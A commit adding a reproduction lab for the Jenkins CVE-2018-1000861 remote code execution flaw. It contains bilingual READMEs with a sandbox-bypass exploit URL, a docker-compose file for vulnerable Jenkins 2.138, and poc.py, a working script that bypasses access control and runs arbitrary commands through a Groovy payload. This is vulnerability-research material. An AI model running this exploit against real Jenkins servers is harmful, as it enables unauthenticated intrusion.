first commit

jenkins/CVE-2018-1000861/README.md

@@ -0,0 +1,45 @@
+# Jenkins Remote Code Execution (CVE-2018-1000861)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Jenkins is a popular open-source automation server.
+
+A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier. In `stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java`, attackers can invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.
+
+Through this vulnerability, multiple exploit chains can be discovered. The most severe one allows unauthenticated users to execute arbitrary commands by bypassing the Groovy sandbox: Before Jenkins executes Groovy scripts in the sandbox, it first checks for syntax errors. This checking process occurs outside the sandbox, allowing attackers to execute arbitrary commands through Meta-Programming during this validation step.
+
+References:
+
+- http://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
+- http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
+- https://0xdf.gitlab.io/2019/02/27/playing-with-jenkins-rce-vulnerability.html
+
+## Environment Setup
+
+Execute the following command to start Jenkins 2.138 with the vulnerable plugins pre-installed:
+
+```
+docker compose up -d
+```
+
+After the server is fully started, visit `http://your-ip:8080` to access Jenkins. No manual installation is required.
+
+## Vulnerability Reproduction
+
+Using @orangetw's [one-click POC script](https://github.com/orangetw/awesome-jenkins-rce-2019), you can execute commands by sending the following request:
+
+```
+http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
+?sandbox=true
+&value=public class x {
+  public x(){
+    "touch /tmp/success".execute()
+  }
+}
+```
+
+![Sending the exploit request](2.png)
+
+The successful creation of `/tmp/success` confirms the remote code execution:
+
+![Verification of command execution](3.png)

jenkins/CVE-2018-1000861/README.zh-cn.md

@@ -0,0 +1,43 @@
+# Jenkins 远程代码执行漏洞（CVE-2018-1000861）
+
+Jenkins 是一个广泛使用的开源自动化服务器。
+
+Jenkins 2.153 及更早版本，LTS 2.138.3 及更早版本存在未授权的远程代码执行漏洞。在 `stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java` 中，攻击者可以通过访问构造的 URL 路径来调用 Java 对象上的某些方法，而这些路径原本并不是设计用来这样调用的。
+
+在这个漏洞中，可以发现多个可利用的攻击链。其中最严重的是通过绕过 Groovy 沙盒导致未授权用户可执行任意命令：Jenkins 在沙盒中执行 Groovy 脚本之前会先检查语法错误，这个检查过程是在沙盒之外进行的，攻击者可以通过元编程（Meta-Programming）的方式在这个验证步骤中执行任意命令。
+
+参考链接：
+
+- http://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
+- http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
+- https://0xdf.gitlab.io/2019/02/27/playing-with-jenkins-rce-vulnerability.html
+
+## 环境搭建
+
+执行如下命令启动 Jenkins 2.138，相关的漏洞插件已预先安装：
+
+```
+docker compose up -d
+```
+
+等待服务器完全启动后，访问 `http://your-ip:8080` 即可看到 Jenkins 已成功运行，无需进行任何手动安装。
+
+## 漏洞复现
+
+使用 @orangetw 提供的[一键化 POC 脚本](https://github.com/orangetw/awesome-jenkins-rce-2019)，发送如下请求即可执行命令：
+
+```
+http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
+?sandbox=true
+&value=public class x {
+  public x(){
+    "touch /tmp/success".execute()
+  }
+}
+```
+
+![发送漏洞利用请求](2.png)
+
+`/tmp/success` 文件的成功创建证实了远程代码执行漏洞的存在：
+
+![命令执行验证](3.png)

jenkins/CVE-2018-1000861/docker-compose.yml

@@ -0,0 +1,7 @@
+services:
+  jenkins:
+    image: vulhub/jenkins:2.138
+    ports:
+      - "50000:50000"
+      - "8080:8080"
+    init: true

jenkins/CVE-2018-1000861/poc.py

@@ -0,0 +1,112 @@
+#!/usr/bin/python
+# coding: UTF-8
+# author: Orange Tsai(@orange_8361)
+# 
+
+import sys
+import requests
+from enum import Enum
+
+# remove bad SSL warnings
+try:
+    requests.packages.urllib3.disable_warnings()
+except:
+    pass
+
+
+endpoint = 'descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript'
+
+class mode(Enum):
+    ACL_PATCHED = 0
+    NOT_JENKINS = 1
+    READ_ENABLE = 2
+    READ_BYPASS = 3
+    ENTRY_NOTFOUND = 999
+
+def usage():
+    print '''
+  Usage:
+    python exp.py <url> <cmd>
+    '''
+
+def _log(msg, fail=False):
+    nb = '[*]'
+    if fail:
+        nb = '[-]'
+    print '%s %s' % (nb, msg)
+
+def _get(url, params=None):
+    r = requests.get(url, verify=False, params=params)
+    return r.status_code, r.content
+
+def _add_bypass(url):
+    return url + 'securityRealm/user/admin/'
+
+def check(url):
+    flag, accessible = mode.ACL_PATCHED, False
+
+    # check ANONYMOUS_READ
+    status, content = _get(url)
+    if status == 200 and 'adjuncts' in content:
+        flag, accessible = mode.READ_ENABLE, True
+        _log('ANONYMOUS_READ enable!')
+    elif status == 403:
+        _log('ANONYMOUS_READ disable!')
+
+        # check ACL bypass, CVE-2018-1000861
+        status, content = _get(_add_bypass(url))
+        if status == 200 and 'adjuncts' in content:
+            flag, accessible = mode.READ_BYPASS, True
+    else:
+        flag = mode.NOT_JENKINS
+
+    # check entry point, CVE-2019-1003005
+    if accessible:
+        if flag is mode.READ_BYPASS:
+            url = _add_bypass(url)
+        status, content = _get(url + endpoint)
+
+        if status == 404:
+            flag = mode.ENTRY_NOTFOUND
+
+    return flag
+
+def exploit(url, cmd):
+    payload = 'public class x{public x(){new String("%s".decodeHex()).execute()}}' % cmd.encode('hex')
+    params = {
+        'sandbox': True, 
+        'value': payload
+    }
+
+    status, content = _get(url + endpoint, params)
+    if status == 200:
+        _log('Exploit success!(it should be :P)')
+    elif status == 405:
+        _log('It seems Jenkins has patched the RCE gadget :(')
+    else:
+        _log('Exploit fail with HTTP status [%d]' % status, fail=True)
+        if 'stack trace' in content:
+            for _ in content.splitlines():
+                if _.startswith('Caused:'):
+                    _log(_, fail=True)
+
+if __name__ == '__main__':
+    if len(sys.argv) != 3:
+        usage()
+        exit()
+
+    url = sys.argv[1].rstrip('/') + '/'
+    cmd = sys.argv[2]
+
+    flag = check(url)
+    if flag is mode.ACL_PATCHED:
+        _log('It seems Jenkins is up-to-date(>2.137) :(', fail=True)
+    elif flag is mode.NOT_JENKINS:
+        _log('Is this Jenkins?', fail=True)
+    elif flag is mode.READ_ENABLE:
+        exploit(url, cmd)
+    elif flag is mode.READ_BYPASS:
+        _log('Bypass with CVE-2018-1000861!')
+        exploit(_add_bypass(url), cmd)
+    else:
+        _log('The `checkScript` is not found, please try other entries(see refs)', fail=True)